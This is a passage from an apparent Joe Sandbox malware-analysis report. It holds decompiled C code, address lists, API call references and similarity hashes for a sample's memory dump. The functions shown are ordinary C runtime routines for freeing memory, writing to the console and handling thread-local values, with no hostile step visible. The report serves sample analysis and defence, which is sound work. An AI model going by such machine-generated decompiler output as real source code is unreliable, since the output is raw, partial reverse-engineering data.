                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B50
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: HeapFree.KERNEL32(00000000,00000000,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?), ref: 0118A6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: GetLastError.KERNEL32(?,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?,?), ref: 0118A702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B5C
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B67
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B72
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B7D
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B88
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B93
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189B9E
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189BA9
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 01189BB7
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: 5935a55bb944044cfc6b1374b3a70be0d33412aa6abdac75777faa6989438ebe
                                                                                                                                                                                                                                                                      • Instruction ID: 2b319010d6107b2a5f793d0c76e28f88c8421fad48e44fa9add0023b718657b2
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5935a55bb944044cfc6b1374b3a70be0d33412aa6abdac75777faa6989438ebe
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6811A77610410DBFCB09FF54D851CD93BA5EF64298B51C1A6FA088F125D732EA91EF80
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                                                                                      			E01193221(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				signed char _v15;
                                                                                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                                                                                      				void _v24;
                                                                                                                                                                                                                                                                      				short _v28;
                                                                                                                                                                                                                                                                      				char _v31;
                                                                                                                                                                                                                                                                      				void _v32;
                                                                                                                                                                                                                                                                      				long _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                                                                                                      				signed char* _v52;
                                                                                                                                                                                                                                                                      				long _v56;
                                                                                                                                                                                                                                                                      				int _v60;
                                                                                                                                                                                                                                                                      				signed int _t78;
                                                                                                                                                                                                                                                                      				signed int _t80;
                                                                                                                                                                                                                                                                      				int _t86;
                                                                                                                                                                                                                                                                      				void* _t94;
                                                                                                                                                                                                                                                                      				long _t97;
                                                                                                                                                                                                                                                                      				void _t105;
                                                                                                                                                                                                                                                                      				void* _t112;
                                                                                                                                                                                                                                                                      				signed int _t116;
                                                                                                                                                                                                                                                                      				signed int _t118;
                                                                                                                                                                                                                                                                      				signed char _t123;
                                                                                                                                                                                                                                                                      				signed char _t128;
                                                                                                                                                                                                                                                                      				intOrPtr _t129;
                                                                                                                                                                                                                                                                      				signed int _t131;
                                                                                                                                                                                                                                                                      				signed char* _t133;
                                                                                                                                                                                                                                                                      				intOrPtr* _t135;
                                                                                                                                                                                                                                                                      				signed int _t136;
                                                                                                                                                                                                                                                                      				void* _t137;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t78 =  *0x121dd74; // 0x2bc0e270
                                                                                                                                                                                                                                                                      				_v8 = _t78 ^ _t136;
                                                                                                                                                                                                                                                                      				_t80 = _a8;
                                                                                                                                                                                                                                                                      				_t118 = _t80 >> 6;
                                                                                                                                                                                                                                                                      				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                                                                                                                                                                                      				_t133 = _a12;
                                                                                                                                                                                                                                                                      				_v52 = _t133;
                                                                                                                                                                                                                                                                      				_v48 = _t118;
                                                                                                                                                                                                                                                                      				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x121e830 + _t118 * 4)) + _t116 + 0x18));
                                                                                                                                                                                                                                                                      				_v40 = _a16 + _t133;
                                                                                                                                                                                                                                                                      				_t86 = GetConsoleCP();
                                                                                                                                                                                                                                                                      				_t135 = _a4;
                                                                                                                                                                                                                                                                      				_v60 = _t86;
                                                                                                                                                                                                                                                                      				 *_t135 = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                                                                                                                                                                                      				while(_t133 < _v40) {
                                                                                                                                                                                                                                                                      					_v28 = 0;
                                                                                                                                                                                                                                                                      					_v31 =  *_t133;
                                                                                                                                                                                                                                                                      					_t129 =  *((intOrPtr*)(0x121e830 + _v48 * 4));
                                                                                                                                                                                                                                                                      					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                                                                                                                                                                                      					if((_t123 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                                      						if(( *(E01189839(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                                                                                                                                                                                      							_push(1);
                                                                                                                                                                                                                                                                      							_push(_t133);
                                                                                                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							if(_t133 >= _v40) {
                                                                                                                                                                                                                                                                      								_t131 = _v48;
                                                                                                                                                                                                                                                                      								 *((char*)( *((intOrPtr*)(0x121e830 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                                                                                                                                                                                      								 *( *((intOrPtr*)(0x121e830 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x121e830 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								_t112 = E011927F0( &_v28, _t133, 2);
                                                                                                                                                                                                                                                                      								_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                      								if(_t112 != 0xffffffff) {
                                                                                                                                                                                                                                                                      									_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                      									goto L9;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t128 = _t123 & 0x000000fb;
                                                                                                                                                                                                                                                                      						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                                                                                                                                                                                      						_push(2);
                                                                                                                                                                                                                                                                      						_v15 = _t128;
                                                                                                                                                                                                                                                                      						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                                                                                                                                                                                      						_push( &_v16);
                                                                                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                                                                                      						_push( &_v28);
                                                                                                                                                                                                                                                                      						_t94 = E011927F0();
                                                                                                                                                                                                                                                                      						_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                                      						if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                                                                                      							_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                                      							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                                                                                                                                                                                      							_v56 = _t97;
                                                                                                                                                                                                                                                                      							if(_t97 != 0) {
                                                                                                                                                                                                                                                                      								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                      									L19:
                                                                                                                                                                                                                                                                      									 *_t135 = GetLastError();
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                                                                                                                                                                                      									if(_v36 >= _v56) {
                                                                                                                                                                                                                                                                      										if(_v31 != 0xa) {
                                                                                                                                                                                                                                                                      											goto L16;
                                                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                                                      											_t105 = 0xd;
                                                                                                                                                                                                                                                                      											_v32 = _t105;
                                                                                                                                                                                                                                                                      											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                                                                                      												if(_v36 >= 1) {
                                                                                                                                                                                                                                                                      													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                                                                                                                                                                                      													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                                      													goto L16;
                                                                                                                                                                                                                                                                      												}
                                                                                                                                                                                                                                                                      											}
                                                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                                                                                      					L16:
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                                                                                      				return E0118DC5F(_v8 ^ _t136);
                                                                                                                                                                                                                                                                      			}


































                                                                                                                                                                                                                                                                      0x01193229
                                                                                                                                                                                                                                                                      0x01193230
                                                                                                                                                                                                                                                                      0x01193233
                                                                                                                                                                                                                                                                      0x0119323b
                                                                                                                                                                                                                                                                      0x0119323f
                                                                                                                                                                                                                                                                      0x0119324b
                                                                                                                                                                                                                                                                      0x0119324e
                                                                                                                                                                                                                                                                      0x01193251
                                                                                                                                                                                                                                                                      0x01193258
                                                                                                                                                                                                                                                                      0x01193260
                                                                                                                                                                                                                                                                      0x01193263
                                                                                                                                                                                                                                                                      0x01193269
                                                                                                                                                                                                                                                                      0x0119326f
                                                                                                                                                                                                                                                                      0x01193274
                                                                                                                                                                                                                                                                      0x01193276
                                                                                                                                                                                                                                                                      0x01193279
                                                                                                                                                                                                                                                                      0x0119327e
                                                                                                                                                                                                                                                                      0x01193288
                                                                                                                                                                                                                                                                      0x0119328f
                                                                                                                                                                                                                                                                      0x01193292
                                                                                                                                                                                                                                                                      0x01193299
                                                                                                                                                                                                                                                                      0x011932a0
                                                                                                                                                                                                                                                                      0x011932cc
                                                                                                                                                                                                                                                                      0x011932f2
                                                                                                                                                                                                                                                                      0x011932f4
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011932ce
                                                                                                                                                                                                                                                                      0x011932d1
                                                                                                                                                                                                                                                                      0x01193398
                                                                                                                                                                                                                                                                      0x011933a4
                                                                                                                                                                                                                                                                      0x011933af
                                                                                                                                                                                                                                                                      0x011933b4
                                                                                                                                                                                                                                                                      0x011932d7
                                                                                                                                                                                                                                                                      0x011932de
                                                                                                                                                                                                                                                                      0x011932e3
                                                                                                                                                                                                                                                                      0x011932e9
                                                                                                                                                                                                                                                                      0x011932ef
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x011932ef
                                                                                                                                                                                                                                                                      0x011932e9
                                                                                                                                                                                                                                                                      0x011932d1
                                                                                                                                                                                                                                                                      0x011932a2
                                                                                                                                                                                                                                                                      0x011932a6
                                                                                                                                                                                                                                                                      0x011932a9
                                                                                                                                                                                                                                                                      0x011932af
                                                                                                                                                                                                                                                                      0x011932b1
                                                                                                                                                                                                                                                                      0x011932b4
                                                                                                                                                                                                                                                                      0x011932b8
                                                                                                                                                                                                                                                                      0x011932f5
                                                                                                                                                                                                                                                                      0x011932f8
                                                                                                                                                                                                                                                                      0x011932f9
                                                                                                                                                                                                                                                                      0x011932fe
                                                                                                                                                                                                                                                                      0x01193304
                                                                                                                                                                                                                                                                      0x0119330a
                                                                                                                                                                                                                                                                      0x01193319
                                                                                                                                                                                                                                                                      0x0119331f
                                                                                                                                                                                                                                                                      0x01193325
                                                                                                                                                                                                                                                                      0x0119332a
                                                                                                                                                                                                                                                                      0x01193346
                                                                                                                                                                                                                                                                      0x011933b9
                                                                                                                                                                                                                                                                      0x011933bf
                                                                                                                                                                                                                                                                      0x01193348
                                                                                                                                                                                                                                                                      0x01193350
                                                                                                                                                                                                                                                                      0x01193359
                                                                                                                                                                                                                                                                      0x0119335f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01193361
                                                                                                                                                                                                                                                                      0x01193363
                                                                                                                                                                                                                                                                      0x01193366
                                                                                                                                                                                                                                                                      0x0119337f
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x01193381
                                                                                                                                                                                                                                                                      0x01193385
                                                                                                                                                                                                                                                                      0x01193387
                                                                                                                                                                                                                                                                      0x0119338a
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0119338a
                                                                                                                                                                                                                                                                      0x01193385
                                                                                                                                                                                                                                                                      0x0119337f
                                                                                                                                                                                                                                                                      0x0119335f
                                                                                                                                                                                                                                                                      0x01193359
                                                                                                                                                                                                                                                                      0x01193346
                                                                                                                                                                                                                                                                      0x0119332a
                                                                                                                                                                                                                                                                      0x01193304
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0119338d
                                                                                                                                                                                                                                                                      0x0119338d
                                                                                                                                                                                                                                                                      0x011933c1
                                                                                                                                                                                                                                                                      0x011933d3

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,01193996,?,00000000,?,00000000,00000000), ref: 01193263
                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 011932DE
                                                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 011932F9
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0119331F
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,01193996,00000000,?,?,?,?,?,?,?,?,?,01193996,?), ref: 0119333E
                                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,01193996,00000000,?,?,?,?,?,?,?,?,?,01193996,?), ref: 01193377
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                      • Opcode ID: 2be62aa3ed8e215e79753d439e5851d4b5a265c496d49c9b592ffd948223d6e0
                                                                                                                                                                                                                                                                      • Instruction ID: eae4fab12c4f7131986cbbe9f2f68857415188717826678d3c525f46461e8efc
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2be62aa3ed8e215e79753d439e5851d4b5a265c496d49c9b592ffd948223d6e0
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251AF70D102499FDF19CFA9D885AEEBBB8FF09300F15415AE971E7281EB309A41CB61
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                                                      			E0118BC35(intOrPtr _a4) {
                                                                                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t45 = _a4;
                                                                                                                                                                                                                                                                      				if(_a4 != 0) {
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45, 7);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0x1c, 7);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0x38, 0xc);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0x68, 0xc);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0x98, 2);
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0xb4, 7);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0xd0, 7);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0xec, 0xc);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0x11c, 0xc);
                                                                                                                                                                                                                                                                      					E0118BBF9(_t45 + 0x14c, 2);
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                                                                                                                                                                                      					E0118A6DA( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                                                                                                                                                                                      					return E0118A6DA( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t18;
                                                                                                                                                                                                                                                                      			}




                                                                                                                                                                                                                                                                      0x0118bc3b
                                                                                                                                                                                                                                                                      0x0118bc40
                                                                                                                                                                                                                                                                      0x0118bc49
                                                                                                                                                                                                                                                                      0x0118bc54
                                                                                                                                                                                                                                                                      0x0118bc5f
                                                                                                                                                                                                                                                                      0x0118bc6a
                                                                                                                                                                                                                                                                      0x0118bc78
                                                                                                                                                                                                                                                                      0x0118bc83
                                                                                                                                                                                                                                                                      0x0118bc8e
                                                                                                                                                                                                                                                                      0x0118bc99
                                                                                                                                                                                                                                                                      0x0118bca7
                                                                                                                                                                                                                                                                      0x0118bcb5
                                                                                                                                                                                                                                                                      0x0118bcc6
                                                                                                                                                                                                                                                                      0x0118bcd4
                                                                                                                                                                                                                                                                      0x0118bce2
                                                                                                                                                                                                                                                                      0x0118bced
                                                                                                                                                                                                                                                                      0x0118bcf8
                                                                                                                                                                                                                                                                      0x0118bd03
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118bd13
                                                                                                                                                                                                                                                                      0x0118bd18

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                        • Part of subcall function 0118BBF9: _free.LIBCMT ref: 0118BC22
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BC83
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: HeapFree.KERNEL32(00000000,00000000,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?), ref: 0118A6F0
                                                                                                                                                                                                                                                                        • Part of subcall function 0118A6DA: GetLastError.KERNEL32(?,?,0118BC27,?,00000000,?,00000000,?,0118BC4E,?,00000007,?,?,0118ADC4,?,?), ref: 0118A702
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BC8E
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BC99
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BCED
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BCF8
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BD03
                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 0118BD0E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.816245564.00000000011DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817184209.000000000121D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.817258824.000000000121F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_1180000_PIyT9A3jfC.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                                                      • Opcode ID: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                                      • Instruction ID: b826c5d2b2b99043c4559ccfde4922243ebb182187b2f99817cc96f61a2f36db
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e25380f97129f0a05355ba1c082cf43b91258dad4189fe5dd706031a12bc249
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C911BE31908B05BBD638BBB1CC05FCB779CAF60348F408815A2DAA6254CB66F4889E84
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                                                                                      			E0118F424(void* __ecx) {
                                                                                                                                                                                                                                                                      				void* _t4;
                                                                                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                                                                                      				void* _t16;
                                                                                                                                                                                                                                                                      				long _t25;
                                                                                                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				if( *0x121dda0 != 0xffffffff) {
                                                                                                                                                                                                                                                                      					_t25 = GetLastError();
                                                                                                                                                                                                                                                                      					_t11 = E0119069E(__eflags,  *0x121dda0);
                                                                                                                                                                                                                                                                      					__eflags = _t11 - 0xffffffff;
                                                                                                                                                                                                                                                                      					if(_t11 == 0xffffffff) {
                                                                                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                                                                                      						_t11 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						__eflags = _t11;
                                                                                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                                                                                      							_t4 = E011906D8(__eflags,  *0x121dda0, 0xffffffff);
                                                                                                                                                                                                                                                                      							_pop(_t16);
                                                                                                                                                                                                                                                                      							__eflags = _t4;
                                                                                                                                                                                                                                                                      							if(_t4 != 0) {
                                                                                                                                                                                                                                                                      								_t28 = E0118A67D(_t16, 1, 0x28);
                                                                                                                                                                                                                                                                      								__eflags = _t28;
                                                                                                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                                                                                                      									L8:
                                                                                                                                                                                                                                                                      									_t11 = 0;
                                                                                                                                                                                                                                                                      									E011906D8(__eflags,  *0x121dda0, 0);
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									__eflags = E011906D8(__eflags,  *0x121dda0, _t28);
                                                                                                                                                                                                                                                                      									if(__eflags != 0) {
                                                                                                                                                                                                                                                                      										_t11 = _t28;
                                                                                                                                                                                                                                                                      										_t28 = 0;
                                                                                                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                                                      										goto L8;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								E0118A6DA(_t28);
                                                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                                                      								goto L5;
                                                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					SetLastError(_t25);
                                                                                                                                                                                                                                                                      					return _t11;
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                                                      0x0118f42b
                                                                                                                                                                                                                                                                      0x0118f43e
                                                                                                                                                                                                                                                                      0x0118f445
                                                                                                                                                                                                                                                                      0x0118f448
                                                                                                                                                                                                                                                                      0x0118f44b
                                                                                                                                                                                                                                                                      0x0118f464
                                                                                                                                                                                                                                                                      0x0118f464
                                                                                                                                                                                                                                                                      0x0118f44d
                                                                                                                                                                                                                                                                      0x0118f44d
                                                                                                                                                                                                                                                                      0x0118f44f
                                                                                                                                                                                                                                                                      0x0118f459
                                                                                                                                                                                                                                                                      0x0118f45f
                                                                                                                                                                                                                                                                      0x0118f460
                                                                                                                                                                                                                                                                      0x0118f462
                                                                                                                                                                                                                                                                      0x0118f472
                                                                                                                                                                                                                                                                      0x0118f476
                                                                                                                                                                                                                                                                      0x0118f478
                                                                                                                                                                                                                                                                      0x0118f48c
                                                                                                                                                                                                                                                                      0x0118f48c
                                                                                                                                                                                                                                                                      0x0118f495
                                                                                                                                                                                                                                                                      0x0118f47a
                                                                                                                                                                                                                                                                      0x0118f488
                                                                                                                                                                                                                                                                      0x0118f48a
                                                                                                                                                                                                                                                                      0x0118f49e
                                                                                                                                                                                                                                                                      0x0118f4a0
                                                                                                                                                                                                                                                                      0x0118f4a0
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118f48a
                                                                                                                                                                                                                                                                      0x0118f4a3
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0118f462
                                                                                                                                                                                                                                                                      0x0118f44f
                                                                                                                                                                                                                                                                      0x0118f4ab
                                                                                                                                                                                                                                                                      0x0118f4b5
                                                                                                                                                                                                                                                                      0x0118f42d
                                                                                                                                                                                                                                                                      0x0118f42f
                                                                                                                                                                                                                                                                      0x0118f42f

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,0118F41B,0118E807), ref: 0118F432
                                                                                                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0118F440
                                                                                                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0118F459
                                                                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,0118F41B,0118E807), ref: 0118F4AB
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.815380758.0000000001181000.00000020.00000001.01000000.00000003.sdmp, Offset: 01180000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815317551.0000000001180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.815648726.0000000001199000.00000002.00000001.01000000.00000003.sdmpDownload File
